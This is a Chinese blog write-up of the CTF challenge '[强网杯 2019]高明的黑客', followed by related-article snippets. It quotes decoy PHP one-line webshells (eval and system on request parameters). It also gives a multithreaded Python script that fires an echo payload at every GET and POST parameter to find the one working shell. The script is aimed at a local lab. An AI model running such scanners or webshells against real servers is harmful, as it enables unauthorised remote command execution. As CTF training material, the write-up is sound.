[强网杯 2019]高明的黑客 wp

最新推荐文章于 2024-01-20 17:01:34 发布
最新推荐文章于 2024-01-20 17:01:34 发布
阅读量940 收藏
点赞数
分类专栏: 笔记 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55185160/article/details/123692925
版权

打开靶场

看到可以在www.tar.gz下载源码,下载下来之后我们可以看到有很多个php文件。

我们任意打开一个,发现有shell,但是又不成立,又利用不了,比如 

$_GET['ganVMUq3d'] = ' ';
eval($_GET['ganVMUq3d'] ?? ' ');

eval($_GET['ganVMUq3d'] ?? ' ');

分析一下 $_GET['ganVMUq3d'] = ' ';令通过get方式传递的变量 ”ganVMUq3d“为空,所以eval($_GET['ganVMUq3d'] ?? ' ');这个一句话木马的参数为空所以这个木马也就不成立了,利用不了。

 if('bTmrt5bHT' == 'r1a0Obii_')

system($_POST['bTmrt5bHT'] ?? ' ');

这里if('bTmrt5bHT' == 'r1a0Obii_')是说如果'bTmrt5bHT' == 'r1a0Obii_'就可以利用post传参去执行system命令,但是'bTmrt5bHT' == 'r1a0Obii_'这个显然是不可以相等的。

在文件中我们还可以找到很多shell,但是都不可以利用,这就是用来混淆我们的,我们需要在3000多个文件中找到可以利用的shell,其实这题主要考察的是写脚本的能力。我们写的思路是首先需要设置多线程,然后打开一个文件,把这个文件中的所有get和post提取出来,然后一次性去访问一个文件里的post和get,看是否有可以利用的参数,如果有就把文件名和参数输出出来,如果没有就断开连接然后去进行下一个文件。这里还有一个重点是要将get和post的访问方式分开用不同的方式进行请求。

下面我们在本地的phpstuy上用php版本为php7进行测试

import os
import requests
import re
import threading
import time

print('开始时间:'+ time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)            #这里设置的最大的线程数
filePath = r"F:/phpstudy_pro/www/src"
os.chdir(filePath)                        #改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5     #设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)              #os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表。
session = requests.Session()
session.keep_alive = False		           # 设置连接活跃状态为False
def get_content(file):                    #
    s1.acquire()
    print('trying   '+file+'    '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:           #打开php文件并提取所有的$_get和$_post的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]',f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]',f.read()))
    data = {}														#所有的$_POST
    params = {}		                                                #所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://127.0.0.1/src/'+file
    req = session.post(url, data=data, params=params)			#一次性请求所有的GET和POST
    req.close()
    req.endcoding ='utf-8'
    content = req.text
    #print(content)
    if "xxxxx" in content:       #如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()
            if "xxxxxx" in content:
                flag=1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content =req.text
                req.close()
                if "xxxxxx" in content:
                    break
        if flag == 1:
            param = a
        else:
            param = b
        print('找到了利用文件: ' + file + "  and 找到了利用的参数:%s" % param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:  # 加入多线程
        t = threading.Thread(target=get_content, args=(i,))
        t.start()

最终发现在了可以利用的文件以及参数。

 

Bri9ht_pe@r1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[强网杯 2019] web题-高明黑客
BROTHERYY的博客
07-08 1009
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
CTF [强网杯 2019]高明黑客 writeup
baynk的博客
04-07 2049
一来搞下,有点意思,然后直接在url后面加上www.tar.gz进行下载文件下载,这文件有点大,下载的有点慢,我以为是出错了,又去扫目录。。wtf。。不管扫啥都是200。。。 不过好在,等扫描完了,文件下好了。 40M,真的狠,一打开,我惊了。 3000个文件。。命令看起来还没啥规则 。 硬着头皮解压后,随意点开一个文件。 1800多行。。。丢在本地环境里面去运行下,还尼玛报错了。 不...
[强网杯 2019]高明黑客
Sk1y的博客
03-26 3307
目录 解题过程 1. 一个简单的exp 2. python 多线程简单实例 3. 一个低配版的exp 4. 高配版 参考链接: 考点:本题目考查的是编写脚本的能力,从中学到了许多。 解题过程 打开题目后,是这样的,显示网站被黑,但是说明了源码的位置 访问/www.tar.gz ,发现这个源码有近40MB!!! 没办法,下载吧。 下载之后,发现里面有3002个项目,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马,这个不可能一个一个试,.
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9604
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 988
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
掘安杯wp分析文件
04-10
根据官方wp复现 和自己参赛记录整理记录的IDA分析文件
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路 本资源为2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路,涵盖了四个题目,分别为蓝01-取证、蓝02-取证、蓝03-取证...
BUUCTF__[强网杯 2019]高明黑客_题解
风过江南乱的博客
05-31 1734
前言 其实这题的唯一考点就是编写 python 脚本。 用了几天时间来看一下 python ,发现有些内容与我以前学的c语言差不多,只是换个形式而已,比如说 if 、for 、while 对文件操作等等。那最大的特点就是很多功能函数,开箱既用,只需要引用模块就行了。可能这就是面向对象编程的特点吧,你不知道它怎么实现的,你只知道它能干什么。 也有很多不一样的,比如说,迭代、元组、继承、异常处理等等。 还有一点是python2 和python3。有点差别,比如说 print 函数等等,python3 有些东西
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
网安小趴菜
09-28 190
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
[强网杯 2019]随便注
m0_56691564的博客
11-30 2658
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是注释都不行,因此这个题使用堆叠注入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
强网杯2023
最新发布
2202_75317918的博客
01-20 1134
当时看到这个题目 也是觉得易懂 并且可以解出来的但是数字实在是过大了兄弟题目意思是计算2^27的阶乘,并获取得到每一位数的数字之和,flag即为该数字的sha256编码2^27为134217728gmpy2包是支持大数运算的,故利用其fac方法进行尝试,在等待一段时间后可以得到对应的结果参考了其他师傅的wp得到运行结果为:4495662081然后利用一个在线工具进行sha256加密即可得到flag。
2019强网杯_web_高明黑客
fly夏天的博客
10-22 1443
之前参加了2019强网杯,当时表现很菜,很多题都不会做。 后来发现buuoj.cn上有复现,以此重新复现一下这次的题目。 话不多说,开始今天的主题。 一访问页面就是如下画面: 因此我们直接访问 url/www.tar.gz即可下载获得源码。 打开压缩包,发现有3000多个php文件。 尝试搜索flag文件,未果。 打开php文件进行代码审计 发现代码中存在一些诸如这样的get或post参数会执行...
强网杯wp
Sentiment的博客
07-22 1010
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网杯wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值